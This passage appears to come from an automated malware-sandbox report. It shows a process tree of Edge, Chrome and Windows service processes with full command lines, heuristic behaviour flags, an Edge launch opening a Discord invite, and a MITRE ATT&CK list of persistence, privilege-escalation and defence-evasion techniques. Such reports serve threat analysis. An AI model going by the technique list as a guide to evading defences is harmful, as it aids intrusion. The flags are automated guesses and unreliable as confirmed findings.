      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
      4⤵
      PID:4464
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4248 /prefetch:8
      4⤵
      PID:3656
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4940 /prefetch:8
      4⤵
      Modifies registry class
      PID:1248
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 /prefetch:8
      4⤵
      PID:844
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:956
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x110,0x114,0x10c,0x108,0x298,0x7ff66fdd5460,0x7ff66fdd5470,0x7ff66fdd5480
        5⤵
        
        PID:3308
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 /prefetch:8
      4⤵
      PID:5888
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:1
      4⤵
      PID:5720
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
      4⤵
      PID:5756
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6604 /prefetch:1
      4⤵
      PID:5832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
      4⤵
      PID:3732
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6272 /prefetch:1
      4⤵
      PID:4560
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/t7PfdVvCah
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:4588
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffb7b0746f8,0x7ffb7b074708,0x7ffb7b074718
      4⤵
      PID:4856
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:2
      4⤵
      PID:3372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
      4⤵
      PID:5460
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
      4⤵
      PID:4908
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
      4⤵
      PID:1560
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
      4⤵
      PID:1688
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:1
      4⤵
      PID:5344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5468 /prefetch:8
      4⤵
      PID:5060
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5476 /prefetch:8
      4⤵
      Modifies registry class
      PID:2084

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffb7942cc40,0x7ffb7942cc4c,0x7ffb7942cc58
  2⤵
  PID:3208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1900 /prefetch:2
  2⤵
  PID:3800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2212,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2228 /prefetch:3
  2⤵
  PID:3260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2464 /prefetch:8
  2⤵
  PID:4864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:2984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3212 /prefetch:1
  2⤵
  PID:4788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4524 /prefetch:1
  2⤵
  PID:4316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4876 /prefetch:8
  2⤵
  PID:5848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4956,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4964 /prefetch:8
  2⤵
  PID:5908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4924,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4836 /prefetch:8
  2⤵
  PID:6092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5108,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4928 /prefetch:8
  2⤵
  PID:4760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5340 /prefetch:8
  2⤵
  PID:5304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4880,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4736 /prefetch:8
  2⤵
  PID:2444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5368,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5440 /prefetch:2
  2⤵
  PID:6060

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5896

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2304

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5160

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:5220

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
- System Location Discovery: System Language Discovery
PID:4252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:3584

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4592

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2988

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4ec 0x410
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5824

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2172

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3800

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:5416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Modify Registry

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery